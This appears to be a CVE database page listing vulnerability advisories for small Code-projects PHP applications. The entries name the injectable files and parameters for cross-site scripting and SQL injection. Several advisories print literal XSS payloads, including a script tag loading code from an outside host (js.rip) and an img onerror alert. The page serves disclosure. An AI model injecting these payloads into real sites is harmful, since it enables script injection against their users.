Vulnerabilities (CVE)

Filtered by vendor Code-projects Subscribe
CVE Vendors Products Updated CVSS v2 CVSS v3
CVE-2023-7136 1 Code-projects 1 Record Management System 2024-01-03 N/A 5.4 MEDIUM
A vulnerability classified as problematic was found in code-projects Record Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /main/doctype.php of the component Document Type Handler. The manipulation of the argument docname with the input "><script src="https://js.rip/b23tmbxf49"></script> leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249139.
CVE-2023-7135 1 Code-projects 1 Record Management System 2024-01-03 N/A 5.4 MEDIUM
A vulnerability classified as problematic has been found in code-projects Record Management System 1.0. Affected is an unknown function of the file /main/offices.php of the component Offices Handler. The manipulation of the argument officename with the input "><script src="https://js.rip/b23tmbxf49"></script> leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249138 is the identifier assigned to this vulnerability.
CVE-2023-7143 1 Code-projects 1 Client Details System 2024-01-03 N/A 4.8 MEDIUM
A vulnerability was found in code-projects Client Details System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /admin/regester.php. The manipulation of the argument fname/lname/email/contact leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249146 is the identifier assigned to this vulnerability.
CVE-2023-7149 1 Code-projects 1 Qr Code Generator 2024-01-03 N/A 6.1 MEDIUM
A vulnerability was found in code-projects QR Code Generator 1.0. It has been classified as problematic. This affects an unknown part of the file /download.php?file=author.png. The manipulation of the argument file with the input "><iMg src=N onerror=alert(document.domain)> leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249153 was assigned to this vulnerability.
CVE-2023-7075 1 Code-projects 1 Point Of Sales And Inventory Management System 2023-12-29 N/A 6.1 MEDIUM
A vulnerability was found in code-projects Point of Sales and Inventory Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /main/checkout.php. The manipulation of the argument pt leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248846 is the identifier assigned to this vulnerability.
CVE-2023-46023 1 Code-projects 1 Simple Task List 2023-11-17 N/A 6.5 MEDIUM
SQL injection vulnerability in addTask.php in Code-Projects Simple Task List 1.0 allows attackers to obtain sensitive information via the 'status' parameter.
CVE-2023-46580 1 Code-projects 1 Inventory Management 2023-11-17 N/A 5.4 MEDIUM
Cross-Site Scripting (XSS) vulnerability in Inventory Management V1.0 allows attackers to execute arbitrary code via the pname parameter of the editProduct.php component.
CVE-2023-46581 1 Code-projects 1 Inventory Management 2023-11-17 N/A 5.5 MEDIUM
SQL injection vulnerability in Inventory Management v.1.0 allows a local attacker to execute arbitrary code via the name, uname and email parameters in the registration.php component.
CVE-2023-46014 1 Code-projects 1 Blood Bank 2023-11-16 N/A 5.5 MEDIUM
SQL Injection vulnerability in hospitalLogin.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via 'hemail' and 'hpassword' parameters.
CVE-2023-46021 1 Code-projects 1 Blood Bank 2023-11-16 N/A 5.5 MEDIUM
SQL Injection vulnerability in cancel.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary commands via the 'reqid' parameter.
CVE-2023-46020 1 Code-projects 1 Blood Bank 2023-11-16 N/A 6.1 MEDIUM
Cross Site Scripting (XSS) in updateprofile.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via the 'rename', 'remail', 'rphone' and 'rcity' parameters.
CVE-2023-46019 1 Code-projects 1 Blood Bank 2023-11-16 N/A 6.1 MEDIUM
Cross Site Scripting (XSS) vulnerability in abs.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via the 'error' parameter.
CVE-2023-46017 1 Code-projects 1 Blood Bank 2023-11-16 N/A 5.5 MEDIUM
SQL Injection vulnerability in receiverLogin.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via 'remail' and 'rpassword' parameters.
CVE-2023-46018 1 Code-projects 1 Blood Bank 2023-11-16 N/A 5.5 MEDIUM
SQL injection vulnerability in receiverReg.php in Code-Projects Blood Bank 1.0 \allows attackers to run arbitrary SQL commands via 'remail' parameter.
CVE-2023-46015 1 Code-projects 1 Blood Bank 2023-11-16 N/A 6.1 MEDIUM
Cross Site Scripting (XSS) vulnerability in index.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via 'msg' parameter in application URL.
CVE-2023-46016 1 Code-projects 1 Blood Bank 2023-11-16 N/A 6.1 MEDIUM
Cross Site Scripting (XSS) in abs.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via the 'search' parameter in the application URL.
CVE-2023-37070 1 Code-projects 1 Hospital Information System 2023-08-18 N/A 4.8 MEDIUM
Code Projects Hospital Information System 1.0 is vulnerable to Cross Site Scripting (XSS)